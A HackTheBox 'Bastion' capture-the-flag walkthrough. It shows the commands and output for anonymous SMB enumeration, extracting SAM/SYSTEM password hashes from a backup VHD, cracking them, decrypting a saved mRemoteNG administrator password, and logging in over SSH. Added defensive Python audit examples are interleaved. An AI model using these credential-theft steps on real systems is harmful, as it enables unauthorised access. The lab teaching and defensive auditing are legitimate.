HackTheBox: Bastion

The first step is to Nmap the machine to find which services are running:

root@kali://root/Documents/bastion# cat scan 
# Nmap 7.70 scan initiated Wed Aug  7 10:36:31 2019 as: nmap -A -oN scan -p- 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.032s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/7%OT=22%CT=1%CU=34774%PV=Y%DS=2%DC=T%G=Y%TM=5D4A9C1A
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10E%II=I%TS=A)SEQ(SP=103%GCD
OS:=1%ISR=10E%CI=I%II=I%TS=A)SEQ(SP=103%GCD=1%ISR=10E%TS=A)OPS(O1=M54DNW8ST
OS:11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DS
OS:T11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=8
OS:0%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(
OS:R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F
OS:=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=
OS:164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -39m58s, deviation: 1h09m14s, median: 0s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-08-07T11:38:29+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-08-07 10:38:26
|_  start_date: 2019-08-07 09:01:18

TRACEROUTE (using port 1720/tcp)
HOP RTT      ADDRESS
1   31.07 ms 10.10.12.1
2   31.11 ms 10.10.10.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug  7 10:38:34 2019 -- 1 IP address (1 host up) scanned in 123.32 seconds

As we can see from the output, SSH and SMB are exposed. I then ran smbmap to find which SMB shares were available:

root@kali:~/Documents/bastion# smbmap -u anonymous -H 10.10.10.134
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445	Name: 10.10.10.134                                      
  Disk                                                  	Permissions
  ----                                                  	-----------
  ADMIN$                                            	NO ACCESS
  Backups                                           	READ, WRITE
  C$                                                	NO ACCESS
  IPC$                                              	READ ONLY

There are two shares we can access anonymously: Backups (READ, WRITE) and IPC$ (READ ONLY). Backups sounds the most promising, so I mounted this share first and browsed the files to see if anything stood out. I found some VHD files inside the \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\ folder.

smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
  .                                   D        0  Fri Feb 22 12:45:32 2019
  ..                                  D        0  Fri Feb 22 12:45:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd      A 37761024  Wed Aug  7 15:34:56 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd      A 5451853824  Wed Aug  7 15:37:53 2019
  BackupSpecs.xml                     A     1186  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml      A     1078  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml      A     8930  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml      A     6542  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml      A     2894  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml      A     1488  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml      A     1484  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml      A     3844  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml      A     3988  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml      A     7110  Fri Feb 22 12:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml      A  2374620  Fri Feb 22 12:45:32 2019

    7735807 blocks of size 4096. 2767174 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\>

I downloaded the largest of the VHD files, as this is more likely to contain something of interest. Once downloaded, I mounted the file using vhdimount to /mnt/test.

root@kali:~/Documents/bastion/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351# vhdimount 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd /mnt/test/
vhdimount 20190309
root@kali:~/Documents/bastion/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351# cd /mnt/test/
root@kali:/mnt/test# ls
vhdi1

As you can see from the output, this has produced a raw image file in /mnt/test. This now needs to be mounted so the filesystem can be accessed. Running fdisk -l on the image file gives us the partition layout.

root@kali:/mnt/test# fdisk -l vhdi1
Disk vhdi1: 100.1 MiB, 104970240 bytes, 205020 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00000000

Device     Boot Start    End Sectors  Size Id Type
vhdi1p1           128 204927  204800  100M  7 HPFS/NTFS/exFAT

Now that we know the start sector of the partition and the sector size, we can mount the partition directly from the image.

root@kali:/mnt/test# mount -o ro,noload,offset=65536 vhdi1 /mnt/just/

The offset for mounting this partition is the start sector multiplied by the sector size, so in this case it is 128 * 512 = 65536 bytes.
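The offset calculation above generalises to any partition table fdisk prints. The following is an added example (not part of the original write-up): it parses `fdisk -l` output, computes the byte offset of every partition from its start sector and the sector size on the Units line, and builds the same read-only mount line used above. The first sample input is the write-up's own fdisk output; the second is a constructed, hypothetical two-partition image with a bootable flag, to show the parser handles the extra column.

```python
import re

# Constructed sample input: the `fdisk -l vhdi1` output shown in the write-up.
FDISK_OUTPUT = """\
Disk vhdi1: 100.1 MiB, 104970240 bytes, 205020 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00000000

Device     Boot Start    End Sectors  Size Id Type
vhdi1p1           128 204927  204800  100M  7 HPFS/NTFS/exFAT
"""

# Second constructed sample (hypothetical image) with a bootable flag and two
# partitions, so the parser is not tied to the single-entry case above.
FDISK_TWO_PARTITIONS = """\
Disk disk.img: 10 GiB, 10737418240 bytes, 20971520 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x12345678

Device     Boot   Start      End  Sectors  Size Id Type
disk.img1  *       2048  1050623  1048576  512M  7 HPFS/NTFS/exFAT
disk.img2       1050624 20971519 19920896  9.5G  7 HPFS/NTFS/exFAT
"""

UNITS_RE = re.compile(r"^Units: sectors of \d+ \* \d+ = (\d+) bytes")


def parse_fdisk(text):
    """Parse `fdisk -l` output. Returns (sector_size, partitions); each
    partition is a dict with device, bootable, start, end, sectors, type
    and the byte offset at which its filesystem begins inside the image."""
    sector_size = None
    partitions = []
    in_table = False
    for line in text.splitlines():
        m = UNITS_RE.match(line)
        if m:
            sector_size = int(m.group(1))
            continue
        if line.startswith("Device"):
            in_table = True          # partition table header reached
            continue
        if not in_table or not line.strip():
            continue
        if sector_size is None:
            raise ValueError("partition table seen before the Units line")
        fields = line.split()
        bootable = len(fields) > 1 and fields[1] == "*"
        if bootable:
            fields.pop(1)            # drop the '*' so the columns line up
        start, end, sectors = int(fields[1]), int(fields[2]), int(fields[3])
        partitions.append({
            "device": fields[0],
            "bootable": bootable,
            "start": start,
            "end": end,
            "sectors": sectors,
            "type": " ".join(fields[6:]),
            "offset": start * sector_size,   # value for mount -o offset=
        })
    return sector_size, partitions


def mount_command(partition, image, mountpoint):
    """Build the read-only mount line from the write-up for one partition.
    'ro' keeps the image unmodified, which matters when it is evidence."""
    return "mount -o ro,noload,offset={} {} {}".format(
        partition["offset"], image, mountpoint)


if __name__ == "__main__":
    sector_size, parts = parse_fdisk(FDISK_OUTPUT)
    for p in parts:
        print(p["device"], "starts at sector", p["start"],
              "-> offset", p["offset"], "bytes")
        print(mount_command(p, "vhdi1", "/mnt/just/"))
```

Mounting read-only is the important part when the image is a backup or a forensic acquisition: it stops the mount from touching the NTFS journal or timestamps, so the copy stays usable as evidence.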

I then went to /mnt/just/Windows/System32/config to dump the password hashes from the SAM hive (with the SYSTEM hive supplying the boot key). I did this using pwdump.

root@kali:/mnt/tmp# cd /mnt/just/Windows/System32/config
root@kali:/mnt/just/Windows/System32/config# pwdump SYSTEM SAM 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

The Administrator hash cannot be recovered using this method. However, the L4mpje NTLM hash is present. I copied the hash and entered it into hashkiller.co.uk, and a precomputed match was returned successfully.
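The reason the Administrator entry is of no use is that 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string (and aad3b435b51404eeaad3b435b51404ee the empty LM hash), so those rows carry no real secret. When reviewing what a leaked backup exposes, the check is the same from the defender's side: which accounts have a real NT hash in the dump and therefore need their password rotated. The following is an added example, not the author's tooling; it parses pwdump-style lines (the three from the write-up are embedded as sample input) and reports each account.

```python
# Constructed sample input: the three pwdump lines shown in the write-up.
PWDUMP_OUTPUT = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""

# Well-known hashes of the empty string. Matching them is how you tell an
# account whose secret is absent or blank from one whose hash is real.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def parse_pwdump(text):
    """Parse user:rid:lmhash:nthash::: lines into dicts with emptiness flags."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError("malformed pwdump line: %r" % line)
        user, rid = parts[0], int(parts[1])
        lm, nt = parts[2].lower(), parts[3].lower()
        records.append({
            "user": user,
            "rid": rid,
            "lm": lm,
            "nt": nt,
            "lm_empty": lm == EMPTY_LM,
            "nt_empty": nt == EMPTY_NT,
        })
    return records


def audit_pwdump(records):
    """Return (user, finding) tuples describing what the dump exposes."""
    findings = []
    for r in records:
        if not r["lm_empty"]:
            # LM hashes are legacy and trivially crackable; modern hosts
            # store the empty LM hash, so a real one is a finding on its own.
            findings.append((r["user"], "LM hash stored: disable LM hash storage"))
        if r["nt_empty"]:
            findings.append((r["user"],
                             "NT hash is the empty-string hash: blank password or no usable secret in this dump"))
        else:
            findings.append((r["user"],
                             "real NT hash exposed by this dump: credential is recoverable, rotate it"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_pwdump(parse_pwdump(PWDUMP_OUTPUT)):
        print("%-14s %s" % (user, finding))
```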

Cracker Results:
                    26112010952d963c8dc4217daec986d9 NTLM bureaulampje

Now with this password I was able to log in to the machine via SSH, browse to the desktop and capture the user flag.

root@kali:/mnt/just/Windows/System32/config# ssh l4mpje@10.10.10.134
l4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                            
(c) 2016 Microsoft Corporation. All rights reserved.                                                              

l4mpje@BASTION C:\Users\L4mpje>   

l4mpje@BASTION C:\Users\L4mpje>cd Desktop                                                                         

l4mpje@BASTION C:\Users\L4mpje\Desktop>dir                                                                        
 Volume in drive C has no label.                                                                                  
 Volume Serial Number is 0CB3-C487                                                                                

 Directory of C:\Users\L4mpje\Desktop                                                                             

22-02-2019  16:27    <DIR>          .                                                                             
22-02-2019  16:27    <DIR>          ..                                                                            
23-02-2019  10:07                32 user.txt                                                                      
               1 File(s)             32 bytes                                                                     
               2 Dir(s)  11.383.808.000 bytes free                                                                

l4mpje@BASTION C:\Users\L4mpje\Desktop>more user.txt                                                              
[REDACTED]

The next step is privilege escalation to try and get an Administrator prompt. I looked around on the machine and found that a piece of software called mRemoteNG had been installed. This is a frontend for software like PuTTY, RDP, VNC etc., and it has the ability to save credentials of frequently visited remote sessions for easy access in the future. One problem with this, however, is that it has been found to store the credentials insecurely. Scripts are available which allow you to enter the encrypted password and output the plaintext result.

The passwords are stored in an XML file called confCons.xml in AppData\Roaming\mRemoteNG.

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir                                                      
 Volume in drive C has no label.                                                                                  
 Volume Serial Number is 0CB3-C487                                                                                

 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG                                                           

22-02-2019  15:03    <DIR>          .                                                                             
22-02-2019  15:03    <DIR>          ..                                                                            
22-02-2019  15:03             6.316 confCons.xml                                                                  
22-02-2019  15:02             6.194 confCons.xml.20190222-1402277353.backup                                       
22-02-2019  15:02             6.206 confCons.xml.20190222-1402339071.backup                                       
22-02-2019  15:02             6.218 confCons.xml.20190222-1402379227.backup                                       
22-02-2019  15:02             6.231 confCons.xml.20190222-1403070644.backup                                       
22-02-2019  15:03             6.319 confCons.xml.20190222-1403100488.backup                                       
22-02-2019  15:03             6.318 confCons.xml.20190222-1403220026.backup                                       
22-02-2019  15:03             6.315 confCons.xml.20190222-1403261268.backup                                       
22-02-2019  15:03             6.316 confCons.xml.20190222-1403272831.backup                                       
22-02-2019  15:03             6.315 confCons.xml.20190222-1403433299.backup                                       
22-02-2019  15:03             6.316 confCons.xml.20190222-1403486580.backup                                       
22-02-2019  15:03                51 extApps.xml                                                                   
22-02-2019  15:03             5.217 mRemoteNG.log                                                                 
22-02-2019  15:03             2.245 pnlLayout.xml                                                                 
22-02-2019  15:01    <DIR>          Themes                                                                        
              14 File(s)         76.577 bytes                                                                     
               3 Dir(s)  11.334.410.240 bytes free

I opened confCons.xml to retrieve the encrypted password. It's visible very near the top and is base64 encoded.

<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit"
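Everything an attacker needs is visible in that file without decrypting anything: the file-level attributes say whether the whole file is encrypted and how many KDF iterations protect the master password, and each Node carries the target host, username and an encrypted password blob. The following is an added example (not the author's decrypt script and not mRemoteNG code) of an audit that inventories those stored credentials from a confCons.xml so they can be rotated or removed. The sample XML is constructed with the same attribute names as the file above but placeholder blobs; the MIN_KDF_ITERATIONS threshold is an assumed review value, not an mRemoteNG setting.

```python
import xml.etree.ElementTree as ET

# Constructed sample: same layout as the confCons.xml in the write-up, with
# placeholder blobs instead of the real Protected/Password values.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="PLACEHOLDER_PROTECTED_BLOB" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Username="Administrator" Domain="" Password="PLACEHOLDER_ENCRYPTED_PASSWORD" Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
    <Node Name="Jump" Type="Connection" Username="svc_jump" Domain="CORP" Password="" Hostname="10.0.0.5" Protocol="SSH2" Port="22" />
</mrng:Connections>
"""

# Assumed review threshold (not an mRemoteNG value): iteration counts below
# this make offline guessing of the master password cheap.
MIN_KDF_ITERATIONS = 10000


def audit_confcons(xml_text):
    """Inventory stored credentials in a confCons.xml without decrypting them."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    full_file_encryption = root.get("FullFileEncryption", "false").lower() == "true"
    kdf_iterations = int(root.get("KdfIterations", "0"))

    file_findings = []
    if not full_file_encryption:
        file_findings.append(
            "FullFileEncryption is false: hostnames, usernames and protocols are readable in clear text")
    if kdf_iterations < MIN_KDF_ITERATIONS:
        file_findings.append(
            "KdfIterations=%d is below the review threshold of %d" % (kdf_iterations, MIN_KDF_ITERATIONS))

    # Node elements are un-namespaced in this file, so iter("Node") finds them.
    stored = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue
        if node.get("Password"):           # non-empty blob = a saved credential
            stored.append({
                "name": node.get("Name"),
                "username": node.get("Username"),
                "domain": node.get("Domain"),
                "hostname": node.get("Hostname"),
                "protocol": node.get("Protocol"),
            })

    return {
        "engine": "%s/%s" % (root.get("EncryptionEngine"), root.get("BlockCipherMode")),
        "full_file_encryption": full_file_encryption,
        "kdf_iterations": kdf_iterations,
        "file_findings": file_findings,
        "stored_credentials": stored,
    }


if __name__ == "__main__":
    report = audit_confcons(SAMPLE_CONFCONS)
    print("cipher:", report["engine"], "kdf iterations:", report["kdf_iterations"])
    for finding in report["file_findings"]:
        print("file:", finding)
    for cred in report["stored_credentials"]:
        print("saved credential for %s@%s (%s) in node %r: rotate and remove"
              % (cred["username"], cred["hostname"], cred["protocol"], cred["name"]))
```

Run this against each confCons.xml and its `.backup` copies found on a host; every node it lists is a credential that anyone who can read the file (or a backup of it, as with the Backups share earlier) should be assumed to hold.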

I then used mremoteng_decrypt.py to decrypt the base64 encoded password from the XML file.

root@kali:~/Documents/bastion# ./mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
root@kali:~/Documents/bastion#

With this password I was able to log in again via SSH, but this time as Administrator.

root@kali:~/Documents/bastion# ssh administrator@10.10.10.134
administrator@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                            
(c) 2016 Microsoft Corporation. All rights reserved.                                                              

administrator@BASTION C:\Users\Administrator>cd Desktop                                                           

administrator@BASTION C:\Users\Administrator\Desktop>more root.txt                                                
[REDACTED]
